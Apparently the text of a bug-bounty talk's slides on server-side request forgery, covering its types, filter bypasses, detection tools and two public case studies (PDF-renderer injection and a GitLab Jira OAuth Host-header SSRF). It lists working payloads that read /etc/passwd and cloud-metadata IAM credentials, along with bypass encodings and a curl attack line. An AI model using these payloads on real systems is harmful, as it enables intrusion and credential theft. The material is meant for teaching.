The document discusses Server Side Request Forgery (SSRF), including what it is, different types (blind and basic), ways to exploit it like bypassing filters and chaining vulnerabilities, tools that can be used for detection, and two case studies of SSRF vulnerabilities found in the wild. The first case involves using an SSRF to retrieve internal data and then storing malicious HTML in a generated PDF. The second case was an unauthenticated blind SSRF in a Jira OAuth authorization controller that was exploited through a malicious Host header.

1. SSRF For Bug Bounties
By Rishabh Nigam
@Cyb3rlant3rn

2. Rishabh Nigam
 Security Analyst in TCS
 Part time Bug hunter
 Passionate about CTF’s, HTB and App Sec.
 @Cyb3rlant3rn
About Me

3.  SSRF and it types?
 Different protocol schema .
 Scenarios encountered.
 Shields Of developer.
 Strategy to hunt for SSRF.
 Leveraging the concept of chaining vulnerability.
 Case study.
 Gold mines for learning .
Contents

4.  Server Side Request Forgery is a vulnerability that allows attacker to
induce the server side application to make request.
What is SSRF?

5. Why does such form of vulnerability exists in applications?

6.  Blind SSRF
 Basic SSRF
Two Major Types

7.  SSRF is said to be blind when the results of are not reflected back.
 The result has to be inferred from Out-of-band techniques.
Blind SSRF

8.  Using collaborator client to monitor the interaction with DNS
and HTTP server.

9.  Disclosing internal headers and ip’s.
For eg X-Forwarded-For:199.102.234.95
 P4 severity.
 Should you immediately report such bugs?
What Can You Score Out Of It?

10.  Figure out vulnerability on other assets.
Chain it! to shock

11.  The response may include local files , response from a service hosted
within the internal network, cloud metadata etc.
 Attacker can get a response back from the server.
Basic SSRF

12. • Intercept a request

13. • Send to intruder

14. • Gotcha!! access to admin panel

15.  file:///etc/passwd
 ldap://loacahost:11211/%0astats/%0aquit
 gopher://127.0.0.1:4242
 http://169.254.169.254/latest/user-data
 http://169.254.169.254/latest/meta-data/iam/security-
credentials/role-name
Try different protocol schema

16.  Commonly used protection mechanisms.
Blacklisting
Practice of not allowing certain address / address range. For eg
• 127.0.0.1
• 192.168.0.1/24
Whitelisting
Practice of allowing only certain addresses .
• redacted.com
• *.redacted.com
Shield Of Developers- Filter!

17.  Bypassing the blacklisting
1)Redirection to blacklist address.
<?php header(“location: http://127.0.0.1”); ?>
2)Use of different encodings.
127.0.0.1—(HEX)--->7f.00.00.01
127.0.0.1—(Oct)--->0177.0000.0000.0001 (017700000001)
3)Use of escaping 0’s.
127.0.0.1 --->127.1
4)Using IPV6
http://127.0.0.1--> http://[::1]/
Breaking The Shield

18.  Bypassing the whitelisting
1)Defeating the regex
target.com--->allowed
target.com.attacker.com ---> also allowed
2)Hunting for open redirect
http://target.com/abc/?parm=http://target.com/def/?redir=ht
tp://127.0.0.1

19.  Burp collaborator
It is burp plugin that allows to detect any external service
interaction or OOB payload.
 Ngrok
Capable of detecting external service interaction and freely
available on https://dashboard.ngrok.com/signup
Tools

20. >./ngrok http 22

21. >sudo nc –nvlp 22

22.  Using google dorks
eg: inurl: “/?redir=“ and site: victim.com
inurl: “/?next=“ and site: victim.com
 Using burp parameter mining
 Open source tools like Arjun.
Tactics To Find Endpoints

23. Case Study 1

24.  Courtsey of Ben Sedeghipour & Cody Brocious.
 Classical talk of Defcon27.
 Web application’s functionality to generate PDF.
 Headless browser and html renders are the helping hand.
 PDF + XSS ---> SSRF
Owning The Clout Through SSRF

25. Simple XSS to SSRF
User Data Transformed PDF
 User Document
<iframe
src=http://169.254.169.254
/userdata>

26.  Most user input gets sanitized/filtered
 We haven’t found an XSS in our target app
 But… we are allowed to customize the fonts and styling of the
generated PDF
 XSS via escaping <style> tag
</style><iframe src=”http://169.254.169.254/user-
data/[...]”>
Tackling The HTML Renders

27.  Weasy print is straightforward HTML renderer written in
Python and it was open source
 It didn’t seem to run any scripts, load iframes, or seemingly
do anything but load images.
 Didn’t render anything fun.
WeasyPrint Makes Hacking (W)easy

28.  No iframe , No javascript.
 Allowed
<img>
<embed>
<link>
<object>
 <link rel=attachment href=”file:///etc/passwd”>
Loophole In The Source

29.  Data is not displayed on opening the pdf.
 Instead data gets embedded.
Look deeper!!

30. Case Study 2

31.  Submitted by Jobert Abma.
 Jira endpoint of gitlab instance was vulnerable.
“Oauth::Jira::AuthorizationsController#access_token”
 Host header was the evil.
“curl -X POST -H 'Host: 162.243.147.21:81'
'https://gitlab.com/-/jira/login/oauth/access_”
Unauthenticated blind SSRF in OAuth Jira
authorization controller

32.  Submitted by Jobert Abma.
 Jira endpoint of gitlab instance was vulnerable.
“Oauth::Jira::AuthorizationsController#access_token”
 Host header was the evil.
“curl -X POST -H 'Host: 162.243.147.21:81'
'https://gitlab.com/-/jira/login/oauth/access_”
Unauthenticated blind SSRF in OAuth Jira
authorization controller

33. Source!!The Root Of All

34.  The response of the server is actually interpreted, but this is
limited to a JSON response that return
an access_token, scope, and token_type.
 Rewarded a bounty of 4000$.
Impact

35.  https://portswigger.net/
 https://github.com/jdonsec/AllThingsSSRF
 https://github.com/incredibleindishell/SSRF_Vulnerable_Lab
 https://hackerone.com/hacktivity
Goldmine Of Knowledge

36. Thank you